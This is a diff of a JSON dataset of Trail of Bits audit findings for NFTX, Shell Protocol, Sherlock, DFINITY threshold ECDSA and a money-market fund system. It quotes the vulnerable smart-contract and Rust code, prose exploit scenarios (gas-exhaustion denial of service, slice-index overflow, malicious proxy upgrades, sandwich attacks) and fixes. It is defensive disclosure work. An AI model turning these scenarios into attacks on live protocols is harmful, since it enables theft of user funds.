IERC20Upgradeable(_vault).balanceOf(address(this)); if (distributionPaused || allocTotal == 0) { IERC20Upgradeable(_vault).safeTransfer(treasury, tokenBalance); return; } uint256 length = feeReceivers.length; uint256 leftover; for (uint256 i; i < length; ++i) { FeeReceiver memory _feeReceiver = feeReceivers[i]; uint256 amountToSend = leftover + ((tokenBalance * _feeReceiver.allocPoint) / allocTotal); uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); amountToSend = amountToSend > currentTokenBalance ? currentTokenBalance : amountToSend; bool complete = _sendForReceiver(_feeReceiver, vaultId, _vault, amountToSend); if (!complete) { uint256 remaining = IERC20Upgradeable(_vault).allowance(address(this), _feeReceiver.receiver); IERC20Upgradeable(_vault).safeApprove(_feeReceiver.receiver, 0); leftover = remaining; } else { leftover = 0; } } if (leftover != 0) { uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); IERC20Upgradeable(_vault).safeTransfer(treasury, currentTokenBalance); } } Figure 6.2: The distribute() function in NFTXSimpleFeeDistributor.sol If the token balance of the contract is low enough (but not zero), the number of tokens distributed to each receiver (amountToSend) will be close to zero. Ultimately, this can disincentivize the use of the protocol, regardless of the number of tokens distributed. Users have to pay the gas fee for the fee distribution operation, the gas fees for the token operations (e.g., redeeming, minting, or swapping), and the protocol fees themselves. Exploit Scenario Alice redeems a token from a vault, pays the necessary protocol fee, sends it to the NFTXSimpleFeeDistributor contract, and calls the distribute() function. Because the balance of the distributor contract is very low (e.g., $0.50), Alice has to pay a substantial amount in gas to distribute a near-zero amount in fees between all fee receiver addresses. Recommendations Short term, add a requirement for a minimum balance that the NFTXSimpleFeeDistributor contract should have for the distribution operation to execute. Alternatively, implement a periodical distribution of fees (e.g., once a day or once every number of blocks). Long term, consider redesigning the fee distribution mechanism to prevent the distribution of small fees. Also consider whether protocol users should pay for said distribution. See appendix D for guidance on redesigning this mechanism.", - "labels": [ - "Trail of Bits", - "Severity: Medium", "Difficulty: High" ] }, { - "title": "7. Risk of denial of service due to unbounded loop ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "When protocol fees are distributed, the system loops through the list of beneciaries (known internally as receivers) to send them the protocol fees they are entitled to. function distribute(uint256 vaultId) external override virtual nonReentrant { require(nftxVaultFactory != address(0)); address _vault = INFTXVaultFactory(nftxVaultFactory).vault(vaultId); uint256 tokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); if (distributionPaused || allocTotal == 0) { IERC20Upgradeable(_vault).safeTransfer(treasury, tokenBalance); return; } uint256 length = feeReceivers.length; uint256 leftover; for (uint256 i; i < length; ++i) { FeeReceiver memory _feeReceiver = feeReceivers[i]; uint256 amountToSend = leftover + ((tokenBalance * _feeReceiver.allocPoint) / allocTotal); uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); amountToSend = amountToSend > currentTokenBalance ? currentTokenBalance : amountToSend; bool complete = _sendForReceiver(_feeReceiver, vaultId, _vault, amountToSend); if (!complete) { uint256 remaining = IERC20Upgradeable(_vault).allowance(address(this), _feeReceiver.receiver); IERC20Upgradeable(_vault).safeApprove(_feeReceiver.receiver, 0); leftover = remaining; } else { leftover = 0; } } if (leftover != 0) { uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); IERC20Upgradeable(_vault).safeTransfer(treasury, currentTokenBalance); } } Figure 7.1: The distribute() function in NFTXSimpleFeeDistributor.sol Because this loop is unbounded and the number of receivers can grow, the amount of gas consumed is also unbounded. function _sendForReceiver(FeeReceiver memory _receiver, uint256 _vaultId, address _vault, uint256 amountToSend) internal virtual returns (bool) { if (_receiver.isContract) { IERC20Upgradeable(_vault).safeIncreaseAllowance(_receiver.receiver, amountToSend); bytes memory payload = abi.encodeWithSelector(INFTXLPStaking.receiveRewards.selector, _vaultId, amountToSend); (bool success, ) = address(_receiver.receiver).call(payload); // If the allowance has not been spent, it means we can pass it forward to next. return success && IERC20Upgradeable(_vault).allowance(address(this), _receiver.receiver) == 0; } else { IERC20Upgradeable(_vault).safeTransfer(_receiver.receiver, amountToSend); return true; } } Figure 7.2: The _sendForReceiver() function in NFTXSimpleFeeDistributor.sol Additionally, if one of the receivers is a contract, code that signicantly increases the gas cost of the fee distribution will execute (gure 7.2). It is important to note that fees are usually distributed within the context of user transactions (redeeming, minting, etc.), so the total cost of the distribution operation depends on the logic outside of the distribute() function. Exploit Scenario The NFTX team adds a new feature that allows NFTX token holders who stake their tokens to register as receivers and gain a portion of protocol fees; because of that, the number of receivers grows dramatically. Due to the large number of receivers, the distribute() function cannot execute because the cost of executing it has reached the block gas limit. As a result, users are unable to mint, redeem, or swap tokens. Recommendations Short term, examine the execution cost of the function to determine the safe bounds of the loop and, if possible, consider splitting the distribution operation into multiple calls. Long term, consider redesigning the fee distribution mechanism to avoid unbounded loops and prevent denials of service. See appendix D for guidance on redesigning this mechanism.", + "title": "8. payoutClaims calling of external contracts in a loop could cause a denial of service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", + "body": "The payoutClaim function uses a loop to call the PreCorePayoutCallback function on a list of external contracts. If any of these calls reverts, the entire payoutClaim function reverts, and, hence, the transaction reverts. This may not be the desired behavior; if that is the case, a denial of service would prevent claims from being paid out. for (uint256 i; i < claimCallbacks.length; i++) { claimCallbacks[i].PreCorePayoutCallback(protocol, _claimID, amount); 499 500 501 } Figure 8.1: contracts/managers/SherlockClaimManager.sol:499-501 The owner of the SherlockClaimManager contract controls the list of contracts on which the PreCorePayoutCallback function is called. The owner can add or remove contracts from this list at any time. Therefore, if a contract is causing unexpected reverts, the owner can x the problem by (temporarily) removing that contract from the list. It might be expected that some of these calls revert and cause the entire transaction to revert. However, the external contracts that will be called and the expected behavior in the event of a revert are currently unknown. If a revert should not cause the entire transaction to revert, the current implementation does not fulll that requirement. To accommodate both casesa revert of an external call reverts the entire transaction or allows the transaction to continue a middle road can be taken. For each contract in the list, a boolean could indicate whether the transaction should revert or continue if the external call fails. If the boolean indicates that the transaction should continue, an emitted event would indicate the contract address and the input arguments of the callback that reverted. This would allow the system to continue functioning while admins investigate the cause of the revert and x the issue(s) if needed. Exploit Scenario Alice, the owner of the SherlockClaimManager contract, registers contract A in the list of contracts on which PreCorePayoutCallback is called. Contract A contains a bug that causes the callback to revert every time. Bob, a protocol agent, successfully les a claim and calls payoutClaim. The transaction reverts because the call to contract A reverts. Recommendations Short term, review the requirements of contracts that will be called by callback functions, and adjust the implementation to fulll those requirements. Long term, when designing a system reliant on external components that have not yet been determined, carefully consider whether to include those integrations during the development process or to wait until those components have been identied. This will prevent unforeseen problems due to incomplete or incorrect integrations with unknown contracts.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: Low", + "Difficulty: Medium" ] }, { - "title": "8. A malicious fee receiver can cause a denial of service ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "Whenever a user executes a minting, redeeming, or swapping operation on a vault, a fee is charged to the user and is sent to the NFXTSimpleFeeDistributor contract for distribution. The distribution function loops through all fee receivers and sends them the number of tokens they are entitled to (see gure 7.1). If the fee receiver is a contract, a special logic is executed; instead of receiving the corresponding number of tokens, the receiver pulls all the tokens from the NFXTSimpleFeeDistributor contract. function _sendForReceiver(FeeReceiver memory _receiver, uint256 _vaultId, address _vault, uint256 amountToSend) internal virtual returns (bool) { if (_receiver.isContract) { IERC20Upgradeable(_vault).safeIncreaseAllowance(_receiver.receiver, amountToSend); bytes memory payload = abi.encodeWithSelector(INFTXLPStaking.receiveRewards.selector, _vaultId, amountToSend); (bool success, ) = address(_receiver.receiver).call(payload); // If the allowance has not been spent, it means we can pass it forward to next. return success && IERC20Upgradeable(_vault).allowance(address(this), _receiver.receiver) == 0; } else { IERC20Upgradeable(_vault).safeTransfer(_receiver.receiver, amountToSend); return true; } } Figure 8.1: The _sendForReceiver() function in NFTXSimpleFeeDistributor.sol In this case, because the receiver contract executes arbitrary logic and receives all of the gas, the receiver contract can spend all of it; as a result, only 1/64 of the original gas forwarded to the receiver contract would remain to continue executing the distribute() function (see EIP-150), which may not be enough to complete the execution, leading to a denial of service. The issue is of high diculty because the addReceiver() function is owner-protected and, as indicated by the NFTX team, the owner is the NFTX DAO. Because the DAO itself was out of scope for this review, we do not know what the process to become a receiver looks like. We assume that a proposal is created and a certain quorum has to be met for it to be executed. Exploit Scenario Eve, a malicious receiver, sets up a smart contract that consumes all the gas forwarded to it when receiveRewards is called. As a result, the distribute() function runs out of gas, causing a denial of service on the vaults calling the function. Recommendations Short term, change the fee distribution mechanism so that only a token transfer is executed even if the receiver is a contract. Long term, consider redesigning the fee distribution mechanism to prevent malicious fee receivers from causing a denial of service on the protocol. See appendix D for guidance on redesigning this mechanism.", + "title": "9. pullReward could silently fail and cause stakers to lose all earned SHER rewards ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", + "body": "If the SherDistributionManager.pullReward function reverts, the calling function (_stake) will not set the SHER rewards in the stakers position NFT. As a result, the staker will not receive the payout of SHER rewards after the stake period has passed. // Sets the timestamp at which this position can first be unstaked/restaked lockupEnd_[_id] = block.timestamp + _period; if (address(sherDistributionManager) == address(0)) return 0; // Does not allow restaking of 0 tokens if (_amount == 0) return 0; // Checks this amount of SHER tokens in this contract before we transfer new ones uint256 before = sher.balanceOf(address(this)); // pullReward() calcs then actually transfers the SHER tokens to this contract try sherDistributionManager.pullReward(_amount, _period, _id, _receiver) returns ( function _stake( uint256 _amount, uint256 _period, uint256 _id, address _receiver 354 355 356 357 358 359 ) internal returns (uint256 _sher) { 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 } catch (bytes memory reason) { _sher = amount; uint256 amount ) { } // If for whatever reason the sherDistributionManager call fails emit SherRewardsError(reason); return 0; // actualAmount should represent the amount of SHER tokens transferred to this contract for the current stake position 382 383 384 385 386 } uint256 actualAmount = sher.balanceOf(address(this)) - before; if (actualAmount != _sher) revert InvalidSherAmount(_sher, actualAmount); // Assigns the newly created SHER tokens to the current stake position sherRewards_[_id] = _sher; Figure 9.1: contracts/Sherlock.sol:354-386 When the pullReward call reverts, the SherRewardsError event is emitted. The staker could check this event and see that no SHER rewards were set. The staker could also call the sherRewards function and provide the positions NFT ID to check whether the SHER rewards were set. However, stakers should not be expected to make these checks after every (re)stake. There are two ways in which the pullReward function can fail. First, a bug in the arithmetic could cause an overow and revert the function. Second, if the SherDistributionManager contract does not hold enough SHER to be able to transfer the calculated amount, the pullReward function will fail. The SHER balance of the contract needs to be manually topped up. If a staker detects that no SHER was set for her (re)stake, she may want to cancel the stake. However, stakers are not able to cancel a stake until the stakes period has passed (currently, at least three months). Exploit Scenario Alice creates a new stake, but the SherDistributionManager contract does not hold enough SHER to transfer the rewards, and the transaction reverts. The execution continues and sets Alices stake allocation to zero. Recommendations Short term, have the system revert transactions if pullReward reverts. Long term, have the system revert transactions if part of the expected rewards are not allocated due to an internal revert. This will prevent situations in which certain users get rewards while others do not.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: High", + "Difficulty: High" ] }, { - "title": "9. Vault managers can grief users ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "The process of creating vaults in the NFTX protocol is trustless. This means that anyone can create a new vault and use any asset as the underlying vault NFT. The user calls the NFTXVaultFactoryUpgradeable contract to create a new vault. After deploying the new vault, the contract sets the user as the vault manager. Vault managers can disable certain vault features (gure 9.1) and change vault fees (gure 9.2). function setVaultFeatures( bool _enableMint, bool _enableRandomRedeem, bool _enableTargetRedeem, bool _enableRandomSwap, bool _enableTargetSwap ) public override virtual { onlyPrivileged(); enableMint = _enableMint; enableRandomRedeem = _enableRandomRedeem; enableTargetRedeem = _enableTargetRedeem; enableRandomSwap = _enableRandomSwap; enableTargetSwap = _enableTargetSwap; emit EnableMintUpdated(_enableMint); emit EnableRandomRedeemUpdated(_enableRandomRedeem); emit EnableTargetRedeemUpdated(_enableTargetRedeem); emit EnableRandomSwapUpdated(_enableRandomSwap); emit EnableTargetSwapUpdated(_enableTargetSwap); } Figure 9.1: The setVaultFeatures() function in NFTXVaultUpgradeable.sol function setFees( uint256 _mintFee, uint256 _randomRedeemFee, uint256 _targetRedeemFee, uint256 _randomSwapFee, uint256 _targetSwapFee ) public override virtual { onlyPrivileged(); vaultFactory.setVaultFees( vaultId, _mintFee, _randomRedeemFee, _targetRedeemFee, _randomSwapFee, _targetSwapFee ); } Figure 9.2: The setFees() function in NFTXVaultUpgradeable.sol The eects of these functions are instantaneous, which means users may not be able to react in time to these changes and exit the vaults. Additionally, disabling vault features with the setVaultFeatures() function can trap tokens in the contract. Ultimately, this risk is related to the trustless nature of vault creation, but the NFTX team can take certain measures to minimize the eects. One such measure, which is already in place, is vault verication, in which the vault manager calls the finalizeVault() function to pass her management rights to the zero address. This function then gives the veried status to the vault in the NFTX web application. Exploit Scenario Eve, a malicious manager, creates a new vault for a popular NFT collection. After it gains some user traction, she unilaterally changes the vault fees to the maximum (0.5 ether), which forces users to either pay the high fee or relinquish their tokens. Recommendations Short term, document the risks of interacting with vaults that have not been nalized (i.e., vaults that have managers). Long term, consider adding delays to manager-only functionality (e.g., a certain number of blocks) so that users have time to react and exit the vault.", + "title": "1. Lack of validation of signed dealing against original dealing ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", + "body": "The EcdsaPreSignerImpl::validate_dealing_support method does not check that the content of signed dealings matches the original dealings. A malicious receiver could exploit this lack of validation by changing the requested height (that is, the support.content.requested_height eld) or internal data (the support.content.idk_dealing.internal_dealing_raw eld) before signing the ECDSA dealing. The resulting signature would not be agged as invalid by the validate_dealing_support method but would result in an invalid aggregated signature. After all nodes sign a dealing, the EcdsaTranscriptBuilderImpl::build_transcript method checks the signed dealings content hashes before attempting to aggregate all the dealing support signatures to produce the nal aggregated signature. The method logs a warning when the hashes do not agree, but does not otherwise act on signed dealings with dierent content. let mut content_hash = BTreeSet::new(); for share in &support_shares { content_hash.insert(ic_crypto::crypto_hash(&share.content)); } if content_hash.len() > 1 { warn!( self.log, \"Unexpected multi share content: support_shares = {}, content_hash = {}\", support_shares.len(), content_hash.len() ); self.metrics.payload_errors_inc(\"invalid_content_hash\"); } if let Some(multi_sig) = self.crypto_aggregate_dealing_support( transcript_state.transcript_params, &support_shares, ) { } transcript_state.add_completed_dealing(signed_dealing.content, multi_sig); Figure 1.1: ic/rs/consensus/src/ecdsa/pre_signer.rs:1015-1034 The dealing content is added to the set of completed dealings along with the aggregated signature. When the node attempts to create a new transcript from the dealing, the aggregated signature is checked by IDkgProtocol::create_transcript. If a malicious receiver changes the content of a dealing before signing it, the resulting invalid aggregated signature would be rejected by this method. In such a case, the EcdsaTranscriptBuilderImpl methods build_transcript and get_completed_transcript would return None for the corresponding transcript ID. That is, neither the transcript nor the corresponding quadruple would be completed. Additionally, since signing requests are deterministically matched against quadruples, including quadruples that are not yet available, this issue could allow a single node to block the service of individual signing requests. pub(crate) fn get_signing_requests<'a>( ecdsa_payload: &ecdsa::EcdsaPayload, sign_with_ecdsa_contexts: &'a BTreeMap, ) -> BTreeMap { let known_random_ids: BTreeSet<[u8; 32]> = ecdsa_payload .iter_request_ids() .map(|id| id.pseudo_random_id) .collect::>(); let mut unassigned_quadruple_ids = ecdsa_payload.unassigned_quadruple_ids().collect::>(); // sort in reverse order (bigger to smaller). unassigned_quadruple_ids.sort_by(|a, b| b.cmp(a)); let mut new_requests = BTreeMap::new(); // The following iteration goes through contexts in the order // of their keys, which is the callback_id. Therefore we are // traversing the requests in the order they were created. for context in sign_with_ecdsa_contexts.values() { if known_random_ids.contains(context.pseudo_random_id.as_slice()) { continue; }; if let Some(quadruple_id) = unassigned_quadruple_ids.pop() { let request_id = ecdsa::RequestId { quadruple_id, pseudo_random_id: context.pseudo_random_id, }; new_requests.insert(request_id, context); } else { break; } } new_requests } Figure 1.2: ic/rs/consensus/src/ecdsa/payload_builder.rs:752-782 Exploit Scenario A malicious node wants to prevent the signing request SRi from completing. Assume that the corresponding quadruple, Qi, is not yet available. The node waits until it receives a dealing corresponding to quadruple Qi. It generates a support message for the dealing, but before signing the dealing, the malicious node changes the dealing.idk_dealing.internal_dealing_raw eld. The signature is valid for the updated dealing but not for the original dealing. The malicious dealing support is gossiped to the other nodes in the network. Since the signature on the dealing support is correct, all nodes move the dealing support to the validated pool. However, when the dealing support signatures are aggregated by the other nodes, the aggregated signature is rejected as invalid, and no new transcript is created for the dealing. This means that the quadruple Qi never completes. Since the matching of signing requests to quadruples is deterministic, SRi is matched with Qi every time a new ECDSA payload is created. Thus, SRi is never serviced. Recommendations Short term, add validation code in EcdsaPreSignerImpl::validate_dealing_support to verify that a signed dealings content hash is identical to the hash of the original dealing. Long term, consider whether the BLS multisignature aggregation APIs need to be better documented to ensure that API consumers verify that all individual signatures are over the same message.", "labels": [ "Trail of Bits", "Severity: Medium", @@ -4112,129 +6800,129 @@ ] }, { - "title": "10. Lack of zero address check in functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. This issue aects the following contracts and functions: NFTXInventoryStaking.sol __NFTXInventoryStaking_init() NFTXSimpleFeeDistributor.sol setInventoryStakingAddress() addReceiver() changeReceiverAddress() RewardDistributionToken __RewardDistributionToken_init() Exploit Scenario Alice deploys a new version of the NFTXInventoryStaking contract. When she initializes the proxy contract, she inputs the zero address as the address of the _nftxVaultFactory state variable, leading to an incorrect initialization. Recommendations Short term, add zero-value checks on all function arguments to ensure that users cannot accidentally set incorrect values, misconguring the system. Long term, use Slither, which will catch functions that do not have zero checks. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "title": "2. The ECDSA payload is not updated if a quadruple fails to complete ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", + "body": "If a transcript fails to complete (as described in TOB-DFTECDSA-1), the corresponding quadruple, Qi, will also fail to complete. This means that the quadruple ID for Qi will remain in the quadruples_in_creation set until the key is reshared and the set is purged. (Currently, the key is reshared if a node joins or leaves the subnet, which is an uncommon occurrence.) Moreover, if a transcript and the corresponding Qi fail to complete, so will the corresponding signing request, SRi, as it is matched deterministically with Qi. let ecdsa_payload = ecdsa::EcdsaPayload { signature_agreements: ecdsa_payload.signature_agreements.clone(), ongoing_signatures: ecdsa_payload.ongoing_signatures.clone(), available_quadruples: if is_new_key_transcript { BTreeMap::new() } else { ecdsa_payload.available_quadruples.clone() }, quadruples_in_creation: if is_new_key_transcript { BTreeMap::new() } else { ecdsa_payload.quadruples_in_creation.clone() }, uid_generator: ecdsa_payload.uid_generator.clone(), idkg_transcripts: BTreeMap::new(), ongoing_xnet_reshares: if is_new_key_transcript { // This will clear the current ongoing reshares, and // the execution requests will be restarted with the // new key and different transcript IDs. BTreeMap::new() } else { ecdsa_payload.ongoing_xnet_reshares.clone() }, xnet_reshare_agreements: ecdsa_payload.xnet_reshare_agreements.clone(), }; Figure 2.1: The quadruples_in_creation set will be purged only when the key is reshared. The canister will never be notied that the signing request failed and will be left waiting indenitely for the corresponding reply from the distributed signing service. Recommendations Short term, revise the code so that if a transcript (permanently) fails to complete, the quadruple ID and corresponding transcripts are dropped from the ECDSA payload. To ensure that a malicious node cannot inuence how signing requests are matched with quadruples, revise the code so that it noties the canister that the signing request failed.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: Medium" ] }, { - "title": "1. Denial-of-service conditions caused by the use of more than 256 slices ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "The owner of a Proteus-based automated market maker (AMM) can update the system parameters to cause a denial of service (DoS) upon the execution of swaps, withdrawals, and deposits. The Proteus AMM engine design supports the creation of an arbitrary number of slices. Slices are used to segment an underlying bonding curve and provide variable liquidity across that curve. The owner of a Proteus contract can update the number of slices by calling the _updateSlices function at any point. When a user requests a swap, deposit, or withdrawal operation, the Proteus contract rst calls the _findSlice function (gure 1.1) to identify the slice in which it should perform the operation. The function iterates across the slices array and returns the index, i, of the slice that has the current ratio of token balances, m. function _findSlice(int128 m) internal view returns (uint8 i) { i = 0; while (i < slices.length) { if (m <= slices[i].mLeft && m > slices[i].mRight) return i; unchecked { ++i; } } // while loop terminates at i == slices.length // if we just return i here we'll get an index out of bounds. return i - 1; } Figure 1.1: The _findSlice() function in Proteus.sol#L1168-1179 However, the index, i, is dened as a uint8. If the owner sets the number of slices to at least 257 (by calling _updateSlices) and the current m is in the 257th slice, i will silently overow, and the while loop will continue until an out-of-gas (OOG) exception occurs. If a deposit, withdrawal, or swap requires the 257th slice to be accessed, the operation will fail because the _findSlice function will be unable to reach that slice. Exploit Scenario Eve creates a seemingly correct Proteus-based primitive (one with only two slices near the asymptotes of the bonding curve). Alice deposits assets worth USD 100,000 into a pool. Eve then makes a deposit of X and Y tokens that results in a token balance ratio, m, of 1. Immediately thereafter, Eve calls _updateSlices and sets the number of slices to 257, causing the 256th slice to have an m of 1.01. Because the current m resides in the 257th slice, the _findSlice function will be unable to nd that slice in any subsequent swap, deposit, or withdrawal operation. The system will enter a DoS condition in which all future transactions will fail. If Eve identies an arbitrage opportunity on another exchange, Eve will be able to call _updateSlices again, use the unlocked curve to buy the token of interest, and sell that token on the other exchange for a pure prot. Eectively, Eve will be able to steal user funds. Recommendations Short term, change the index, i, from the uint8 type to uint256; alternatively, create an upper limit for the number of slices that can be created and ensure that i will not overow when the _findSlice function searches through the slices array. Long term, consider adding a delay between a call to _updateSlices and the time at which the call takes eect on the bonding curve. This will allow users to withdraw from the system if they are unhappy with the new parameters. Additionally, consider making slices immutable after their construction; this will signicantly reduce the risk of undened behavior.", + "title": "3. Malicious canisters can exhaust the number of available quadruples ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", + "body": "By requesting a large number of signatures, a canister (or set of canisters) could exhaust the number of available quadruples, preventing other signature requests from completing in a timely manner. The ECDSA payload builder defaults to creating one extra quadruple in create_data_payload if there is no ECDSA conguration for the subnet in the registry. let ecdsa_config = registry_client .get_ecdsa_config(subnet_id, summary_registry_version)? .unwrap_or(EcdsaConfig { quadruples_to_create_in_advance: 1, // default value ..EcdsaConfig::default() }); Figure 3.1: ic/rs/consensus/src/ecdsa/payload_builder.rs:400-405 Signing requests are serviced by the system in the order in which they are made (as determined by their CallbackID values). If a canister (or set of canisters) makes a large number of signing requests, the system would be overwhelmed and would take a long time to recover. This issue is partly mitigated by the fee that is charged for signing requests. However, we believe that the nancial ramications of this problem could outweigh the fees paid by attackers. For example, the type of denial-of-service attack described in this nding could be devastating for a DeFi application that is sensitive to small price uctuations in the Bitcoin market. Since the ECDSA threshold signature service is not yet deployed on the Internet Computer, it is unclear how the service will be used in practice, making the severity of this issue dicult to determine. Therefore, the severity of this issue is marked as undetermined. Exploit Scenario A malicious canister learns that another canister on the Internet Computer is about to request a time-sensitive signature on a message. The malicious canister immediately requests a large number of signatures from the signing service, exhausting the number of available quadruples and preventing the original signature from completing in a timely manner. Recommendations One possible mitigation is to increase the number of quadruples that the system creates in advance, making it more expensive for an attacker to carry out a denial-of-service attack on the ECDSA signing service. Another possibility is to run multiple signing services on multiple subnets of the Internet Computer. This would have the added benet of protecting the system from resource exhaustion related to cross-network bandwidth limitations. However, both of these solutions scale only linearly with the number of added quadruples/subnets. Another potential mitigation is to introduce a dynamic fee or stake based on the number of outstanding signing requests. In the case of a dynamic fee, the canister would pay a set number of tokens proportional to the number of outstanding signing requests whenever it requests a new signature from the service. In the case of a stake-based system, the canister would stake funds proportional to the number of outstanding requests but would recover those funds once the signing request completed. As any signing service that depends on consensus will have limited throughput compared to a centralized service, this issue is dicult to mitigate completely. However, it is important that canister developers are aware of the limits of the implementation. Therefore, regardless of the mitigations imposed, we recommend that the DFINITY team clearly document the limits of the current implementation.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Undetermined", "Difficulty: Low" ] }, { - "title": "2. LiquidityPoolProxy owners can steal user funds ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "The LiquidityPoolProxy contract implements the IOceanPrimitive interface and can integrate with the Ocean contract as a primitive. The proxy contract calls into an implementation contract to perform deposit, swap, and withdrawal operations (gure 2.1). function swapOutput(uint256 inputToken, uint256 inputAmount) public view override returns (uint256 outputAmount) { (uint256 xBalance, uint256 yBalance) = _getBalances(); outputAmount = implementation.swapOutput(xBalance, yBalance, inputToken == xToken ? 0 : 1, inputAmount); } Figure 2.1: The swapOutput() function in LiquidityPoolProxy.sol#L3947 However, the owner of a LiquidityPoolProxy contract can perform the privileged operation of changing the underlying implementation contract via a call to setImplementation (gure 2.2). The owner could thus replace the underlying implementation with a malicious contract to steal user funds. function setImplementation(address _implementation) external onlyOwner { } implementation = ILiquidityPoolImplementation(_implementation); Figure 2.2: The setImplementation() function in LiquidityPoolProxy.sol#L2833 This level of privilege creates a single point of failure in the system. It increases the likelihood that a contracts owner will be targeted by an attacker and incentivizes the owner to act maliciously. Exploit Scenario Alice deploys a LiquidityPoolProxy contract as an Ocean primitive. Eve gains access to Alices machine and upgrades the implementation to a malicious contract that she controls. Bob attempts to swap USD 1 million worth of shDAI for shUSDC by calling computeOutputAmount. Eves contract returns 0 for outputAmount. As a result, the malicious primitives balance of shDAI increases by USD 1 million, but Bob does not receive any tokens in exchange for his shDAI. Recommendations Short term, document the functions and implementations that LiquidityPoolProxy contract owners can change. Additionally, split the privileges provided to the owner role across multiple roles to ensure that no one address has excessive control over the system. Long term, develop user documentation on all risks associated with the system, including those associated with privileged users and the existence of a single point of failure.", + "title": "4. Aggregated signatures are dropped if their request IDs are not recognized ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", + "body": "The update_signature_agreements function populates the set of completed signatures in the ECDSA payload. The function aggregates the completed signatures from the ECDSA pool by calling EcdsaSignatureBuilderImpl::get_completed_signatures. However, if a signatures associated signing request ID is not in the set of ongoing signatures, update_signature_agreements simply drops the signature. for (request_id, signature) in builder.get_completed_signatures( chain, ecdsa_pool.deref() ) { if payload.ongoing_signatures.remove(&request_id).is_none() { warn!( log, \"ECDSA signing request {:?} is not found in payload but we have a signature for it\", request_id ); } else { payload .signature_agreements .insert(request_id, ecdsa::CompletedSignature::Unreported(signature)); } } Figure 4.1: ic/rs/consensus/src/ecdsa/payload_builder.rs:817-830 Barring an implementation error, this should not happen under normal circumstances. Recommendations Short term, consider adding the signature to the set of completed signatures on the next ECDSA payload. This will ensure that all outstanding signing requests are completed. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: High" + "Severity: Informational", + "Difficulty: N/A" ] }, { - "title": "3. Risk of sandwich attacks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "The Proteus liquidity pool implementation does not use a parameter to prevent slippage. Without such a parameter, there is no guarantee that users will receive any tokens in a swap. The LiquidityPool contracts computeOutputAmount function returns an outputAmount value indicating the number of tokens a user should receive in exchange for the inputAmount. Many AMM protocols enable users to specify the minimum number of tokens that they would like to receive in a swap. This minimum number of tokens (indicated by a slippage parameter) protects users from receiving fewer tokens than expected. As shown in gure 3.1, the computeOutputAmount function signature includes a 32-byte metadata eld that would allow a user to encode a slippage parameter. function computeOutputAmount( uint256 inputToken, uint256 outputToken, uint256 inputAmount, address userAddress, bytes32 metadata ) external override onlyOcean returns (uint256 outputAmount) { Figure 3.1: The signature of the computeOutputAmount() function in LiquidityPool.sol#L192198 However, this eld is not used in swaps (gure 3.2) and thus does not provide any protection against excessive slippage. By using a bot to sandwich a users trade, an attacker could increase the slippage incurred by the user and prot o of the spread at the users expense. function computeOutputAmount( uint256 inputToken, uint256 outputToken, uint256 inputAmount, address userAddress, bytes32 metadata ) external override onlyOcean returns (uint256 outputAmount) { ComputeType action = _determineComputeType(inputToken, outputToken); [...] } else if (action == ComputeType.Swap) { // Swap action + computeOutput context => swapOutput() outputAmount = swapOutput(inputToken, inputAmount); emit Swap( inputAmount, outputAmount, metadata, userAddress, (inputToken == xToken), true ); } [...] Figure 3.2: Part of the computeOutputAmount() function in LiquidityPool.sol#L192260 Exploit Scenario Alice wishes to swap her shUSDC for shwETH. Because the computeOutputAmount functions metadata eld is not used in swaps to prevent excessive slippage, the trade can be executed at any price. As a result, when Eve sandwiches the trade with a buy and sell order, Alice sells the tokens without purchasing any, eectively giving away tokens for free. Recommendations Short term, document the fact that protocols that choose to use the Proteus AMM engine should encode a slippage parameter in the metadata eld. The use of this parameter will reduce the likelihood of sandwich attacks against protocol users. Long term, ensure that all calls to computeOutputAmount and computeInputAmount use slippage parameters when necessary, and consider relying on an oracle to ensure that the amount of slippage that users can incur in trades is appropriately limited.", + "title": "1. Canceling all transaction requests causes DoS on MMF system ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "Any shareholder can cancel any transaction request, which can result in a denial of service (DoS) from the MMF system. The TransactionalModule contract uses transaction requests to store buy and sell orders from users. These requests are settled at the end of the day by the admins. Admins can create or cancel a request for any user. Users can create requests for themselves and cancel their own requests. The TransferAgentGateway contract is an entry point for all user and admin actions. It implements access control checks and forwards the calls to their respective modules. The cancelRequest function in the 